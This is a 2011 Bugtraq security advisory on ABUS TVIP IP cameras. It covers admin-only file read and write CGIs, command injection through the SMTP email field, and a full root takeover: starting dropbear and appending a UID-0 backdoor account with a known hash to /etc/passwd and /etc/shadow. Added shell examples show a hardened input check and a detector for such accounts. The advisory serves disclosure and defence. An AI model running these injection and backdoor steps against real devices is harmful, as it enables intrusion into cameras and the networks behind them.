Message-ID: <54337.5353b77c.1318048665.nsm@mail.stream-portal.org>
Date: Sat, 8 Oct 2011 06:37:45 +0200 (CEST)
From: "Marco van Berkum" <marco@...eam-portal.org>
To: Bugtraq@...urityfocus.com
Subject: ABUS TVIP 11550/21550 Multiple vulnerabilities (and possibly other ABUS cams)
Title : ABUS TVIP 11550/21550 Multiple vulnerabilities (and possibly other ABUS cams)
Author : Marco van Berkum
- Summary
- Arbitrary file read
- Arbitrary file upload
- Arbitrary command execution (input validation bug)
- How it's totally compromised including ssh root login.
- Summary
The ABUS TVIP 11550 and 21550 are IP webcams that are configured via a web interface.
While experimenting, multiple vulnerabilities were discovered that give root access to the operating system of the camera (Debian Linux). The web server of the camera is BOA and runs as root, so everything reachable through the admin CGIs runs as root as well.
Although these vulnerabilities can ONLY be exploited when logged in as admin, they can still be considered critical, since a compromised camera can be used to gain access to the network behind it. I did not find a way past the login screen without proper credentials (yet).
- Arbitrary file read
When logged in as admin it is possible to read any file on the filesystem, since the fileread CGI does not restrict the requested path and the web server runs as root:
http://ipcamera/cgi-bin/admin/fileread?READ.filePath=/etc/shadow
- Arbitrary file upload
Similar to the fileread CGI, there is also a filewrite CGI that can (over)write any file, again as root:
http://ipcamera/cgi-bin/admin/filewrite?SAVE.filePath=/tmp/file%26SAVE
- Arbitrary command execution (input validation bug)
The camera has several HTML forms to configure services such as an FTP client and an SMTP client. These are used to notify users and upload videos when the camera's motion detection detects movement. These HTML forms can be used to execute arbitrary commands as root. I've found bugs in the SMTP and FTP forms, but probably other forms will contain the same bug (unchecked).
Exploit:
In the configuration -> SMTP general part there is a web form where an administrator's e-mail address can be filled out (Administrator e-Mail address). The form does not check for shell metacharacters such as ;, | and `.
When a test e-mail is sent from this form, the web interface executes ssmtp -t <your_input> through a shell, so the submitted value becomes part of the command line. It is therefore possible to 'break' the command line by using `ls`, for instance. After submitting the command via the 'test' button this will be the output:
smtp: Connect to host
smtp: MAIL FROM:<backup>
SMTP server error
................SMTP Test Failed...........
The first line of the `ls` output, backup, ends up in the MAIL FROM line, which means the command runs in a directory that contains a backup directory. `pwd` also works:
smtp: Connect to host
smtp: MAIL FROM:</opt/cgi/admin>
SMTP server error
................SMTP Test Failed...........
Unfortunately only the first line of the command output ends up in the MAIL FROM line. But we can work around this :)
The system also has a System Log function that shows the contents of the system log. If we want more than the first line, for instance for "ls /", we can fill out `ls /|logger`, which sends the output line by line to the system log via syslog. It can then be viewed from the web interface:
Oct 8 14:35:15 <notice > root: bin
Oct 8 14:35:15 <notice > root: dev
Oct 8 14:35:15 <notice > root: etc
Oct 8 14:35:15 <notice > root: include
Oct 8 14:35:15 <notice > root: init
Oct 8 14:35:15 <notice > root: lib
Oct 8 14:35:15 <notice > root: linuxrc
Oct 8 14:35:15 <notice > root: mnt
Oct 8 14:35:15 <notice > root: opt
Oct 8 14:35:15 <notice > root: proc
Oct 8 14:35:15 <notice > root: root
Oct 8 14:35:15 <notice > root: sbin
Oct 8 14:35:15 <notice > root: smtp_test.sh
Oct 8 14:35:15 <notice > root: sys
Oct 8 14:35:15 <notice > root: tag_replace.sh
Oct 8 14:35:15 <notice > root: tmp
Oct 8 14:35:15 <notice > root: usr
Oct 8 14:35:15 <notice > root: var
Oct 8 14:35:15 <notice > root: web
The complete command output can also be obtained by redirecting it to a readable file in the web server's document root, for instance with `ls -alR />/web/html/lsoutput.txt`.
It can then be fetched at http://ipcamera/lsoutput.txt
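The SMTP test path described above, as an added example that is not from the advisory or from the ABUS firmware: a stand-in POSIX shell script that reproduces the vulnerable pattern (the submitted address spliced into a command string that a shell interprets) beside a hardened version that whitelists the address syntax and passes the value as a single argument. The mailer is replaced by echo so the script runs anywhere; the function names and the exact way the firmware builds the command line are assumptions, since the advisory only shows that ssmtp -t <input> is run and that backticks are honoured.

```shell
#!/bin/sh
# Added example: stand-in for the camera's SMTP test. The real mailer is
# replaced by 'echo' so the effect of the injected input is visible and the
# script runs anywhere. How the firmware actually builds the command line is
# not shown in the advisory; this only reproduces the observed behaviour.

# Vulnerable pattern (assumed): the submitted address is spliced into a
# command string that is handed to a shell, so `cmd`, ';' and '|' in the
# address are interpreted, exactly as the advisory observes.
smtp_test_vulnerable() {
    addr="$1"
    sh -c "echo ssmtp -t $addr"
}

# Whitelist check: only characters that occur in an ordinary address,
# exactly one '@', and a dot in the domain part. Everything else, which
# includes every shell metacharacter, is rejected.
is_safe_address() {
    case "$1" in
        *[!A-Za-z0-9._%+@-]*) return 1 ;;
    esac
    case "$1" in
        *@*@*) return 1 ;;
        *@*.*) return 0 ;;
    esac
    return 1
}

# Hardened version: validate first, then pass the address as one argv
# element. No shell ever sees the user-controlled string as code.
smtp_test_hardened() {
    addr="$1"
    if ! is_safe_address "$addr"; then
        echo "rejected: invalid administrator address" >&2
        return 1
    fi
    echo ssmtp -t "$addr"
}

# Demo with the advisory's trick: a backtick command in the address field.
payload='admin@example.com`echo INJECTED`'
echo "vulnerable: $(smtp_test_vulnerable "$payload")"
echo "hardened:   $(smtp_test_hardened "$payload" 2>&1 || true)"
echo "hardened:   $(smtp_test_hardened 'admin@example.com')"
```

The vulnerable function prints `ssmtp -t admin@example.comINJECTED`, i.e. the inner shell ran the backtick command and its output replaced the address, which is the same mechanism that produced `MAIL FROM:<backup>` above. Quoting the variable alone would not be enough if the CGI still builds a string for a shell; the fix is to never hand user input to a shell at all and to validate it before use.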
- How it's totally compromised including ssh root login.
I did it in a few steps. First I did a `ls -alR />/web/html/lsoutput.txt` to see what was on the filesystem and noticed that dropbear is available on the system. Dropbear is an SSH server/client :)
So, I started it with the `/etc/dropbear/dropbear` command.
Then I took a look at the /etc/shadow file and noticed that user root had no password, so ssh'ing in was not an option, yet. So I had to create a user, which I did the following way:
`echo 'test:x:0:0:test:/tmp:/bin/sh'>>/etc/passwd`
and
`echo 'test:$1$/DqZS5Cm$PUeCTPpYIrGQnxsZtsfDY1:12963:0:99999:7:::'>>/etc/shadow`
So, now we can log in as user test with password test. User test has UID 0, thus root.
test@...amera's password:
Welcome to
_____ __ ___ __ ___ _ _ _
| ___| / \ / __ \ / \ | _ \ / \ \ \ / /
| |___ / /\ \ | /__\ \ / /\ \ | | \ | / /\ \ \ V /
| ___|| |__| | | _ / | |__| | | | | | | |__| | \ /
| | | __ | | | \ \ | __ | | |_/ / | __ | | |
|_| |_| |_| |_| \_\|_| |_| |___ / |_| |_| |_|
For further information check:
http://www.GM.com/
BusyBox v1.1.3 (2010.05.10-11:54+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
[test]#
Voila ;)
Also, it's possible to mount a Samba or NFS share via the web interface and copy files that way.
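A triage check for the persistence step described above, added here as an example and not part of the advisory: given passwd- and shadow-format files, it lists every account with UID 0 that is not root and every account that carries a usable password hash, which is exactly what the appended test user looks like. The sample files are constructed for the demo; only the test user's line is taken from the advisory, and root is shown locked with `*` as an assumption.

```shell
#!/bin/sh
# Added example: spot the backdoor account technique from the advisory.
# Works on any passwd/shadow-format file, so it can be run against files
# pulled off a camera with the fileread CGI as well as on a live host.

# Print every account with UID 0 other than root, one per line.
# $1 = path to a passwd-format file
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Print every account whose password field is a real hash, i.e. not empty
# and not a locked marker starting with '*' or '!', one per line.
# $1 = path to a shadow-format file
accounts_with_usable_hash() {
    awk -F: '$2 != "" && $2 !~ /^[*!]/ { print $1 }' "$1"
}

# Demo on constructed files (not real camera contents).
sample_passwd=$(mktemp)
sample_shadow=$(mktemp)
cat >"$sample_passwd" <<'EOF'
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/false
test:x:0:0:test:/tmp:/bin/sh
EOF
cat >"$sample_shadow" <<'EOF'
root:*:0:0:99999:7:::
daemon:*:0:0:99999:7:::
test:$1$/DqZS5Cm$PUeCTPpYIrGQnxsZtsfDY1:12963:0:99999:7:::
EOF

echo "UID 0 accounts other than root:"
extra_uid0_accounts "$sample_passwd"
echo "Accounts with a usable password hash:"
accounts_with_usable_hash "$sample_shadow"
rm -f "$sample_passwd" "$sample_shadow"
```

Both checks flag the appended test user. On a device like this one, also look for a running dropbear that was not started by the init scripts and for unexpected files under /web/html, since the advisory uses both as part of the same intrusion.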
Just my two cents
Marco van Berkum